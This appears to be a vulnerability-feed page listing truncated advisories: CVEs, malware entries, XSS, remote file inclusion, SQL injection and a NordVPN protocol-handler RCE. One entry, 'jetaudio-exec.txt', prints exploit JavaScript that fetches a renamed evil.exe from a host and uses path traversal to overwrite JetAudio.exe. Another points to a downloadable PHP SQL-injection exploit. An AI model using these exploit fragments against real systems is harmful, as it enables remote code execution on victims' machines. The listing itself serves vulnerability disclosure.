CVE-2022-27834

Use after free vulnerability in dspcontextunloadgraph function of DSP driver prior to SMR Apr-2022 Release 1 allows attackers to perform malicious actions...

EUVD-2018-15663

Malware in sbrugna...

EUVD-2020-12387

Malware in sbrugna...

EUVD-2020-25794

Malware in sbrugna...

Microsoft Edge (Chromium-based) Webview2 Spoofing Vulnerability

Microsoft Edge is a web browser from the American company Microsoft that comes with systems after Windows 10. A spoofing vulnerability exists in Microsoft Edge Chromium-based Webview2, which can be exploited by attackers to conduct spoofing attacks...

Denial of Service Vulnerability in XStream

XStream is an open source Java class library developed by the XStream team , it is mainly used to serialize objects into XML JSON or deserialized into objects . A denial of service vulnerability exists in Xstream. An attacker can exploit the vulnerability to cause a denial of service attack...

CloudBees Jenkins Claim Plugin Cross-Site Scripting Vulnerability

Jenkins Claim is an open source application plugin for Jenkins. Provides users to declare failed builds and tests from Jenkins to show that they are responsible for fixing them . A cross-site script execution vulnerability exists in Jenkins Claim Plugin version 2.18.1 and earlier. The vulnerabili...

Authentication Bypass Vulnerability in Pi Windows web panel login

Xiaopi Windows web panel is the phpStudy official website released the server environment to build the operating panel, generally referred to as Xiaopi panel. An authentication bypass vulnerability exists in the Xiaopi Windows web panel login. An attacker can exploit the vulnerability to cause a...

Nord Security: Possible RCE through Windows Custom Protocol on Windows client

Summary: The NordVPN windows client application registered two custom protocols NordVPN: and NordVPN.Notification: for process communication. This makes us are able to communicate with NordVPN.exe from web browser. After looking the executable binary, I noticed the class...

Atlassian JIRA Server and Data Center Authorization Issues Vulnerability (CNVD-2021-17354)

Atlassian JIRA Server and Atlassian JIRA Data Center are both products of Atlassian Australia.Atlassian JIRA Server is the server version of a defect tracking management system. Atlassian JIRA Server is the server version of a defect tracking management system that is used to track and manage all...

Google Android - Inter-Process munmap with User-Controlled Size in android.graphics.Bitmap

Google Android - Inter-Process munmap with User-Controlled Size in android.graphics.Bitmap Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=928 Bitmap objects can be passed between processes by flattening them to a Parcel in one process and un-flattening them in another. In order...

MvMmallv5. 5SQL injection of php exp exploit-vulnerability warning-the black bar safety net

Vulnerability type: MvMmall v5. 5. 1 SQL injection vulnerability Default background:admincp. php? module=index Google search:”Powered by MvMmall v5. 5. 1" One, use: php exp use 1 Install the php environment Use phpnow very simple to install. 2 Use exp attack Link: Extract password: aahj The exp...

Magic Photo Storage Website user/logout.php _config[site_path] Parameter Remote File Inclusion

No description provided by source. source: http://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the...

EsContacts 1.0 - groupes.php?msg Cross-Site Scripting

EsContacts 1.0 - groupes.php?msg Cross-Site Scripting source: https://www.securityfocus.com/bid/28825/info EsContacts is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. Attackers may leverage these issues to execute arbitrary scrip...

jetaudio-exec.txt

Tested on:.. - jetAudio 7.0.3 Basic - Microsoft Internet Explorer 6 Just for fun ; -- var target = "DownloadFromMusicStore"; //rename evil.exe evil.mp3 var url = "http://192.168.0.1/evil.mp3"; var dst = "..\..\..\..\..\..\..\..\Program Files\JetAudio\JetAudio.exe"; var title = "0day"; var...

Tagit! Tagit2b 2.1.B Build 2 - tagminreadconf.php?Admin Remote File Inclusion

Tagit! Tagit2b 2.1.B Build 2 - tagminreadconf.php?Admin Remote File Inclusion source: https://www.securityfocus.com/bid/22518/info TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may all...

DanPHPSupport 0.5 - 'admin.php?do' Cross-Site Scripting

source: https://www.securityfocus.com/bid/20203/info DanPHPSupport is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. An attacker may leverage these issues to have arbitrary script code execute in the browser of an...

BasiliX Webmail 1.1 - Email Header HTML Injection

BasiliX Webmail 1.1 - Email Header HTML Injection source: https://www.securityfocus.com/bid/10662/info BasiliX Webmail is reported to be prone to an email header HTML injection vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied email header strings...

Microsoft Internet Explorer 5.0.1 - Wildcard DNS Cross-Site Scripting

source: https://www.securityfocus.com/bid/10554/info Microsoft Internet Explorer is reported to contain a cross-site scripting vulnerability for sites that have a wildcard DNS entry. A web server with a wildcard DNS entry will respond to any hostname requested. An example DNS entry of .example.co...

vBulletin 3.0 - 'search.php' Cross-Site Scripting

source: https://www.securityfocus.com/bid/9656/info It has been reported that VBulletin is prone to a cross-site scripting vulnerability in the 'search.php' script. This issue is reportedly due to a failure to sanitize user input and so allow HTML and script code that may facilitate cross-site...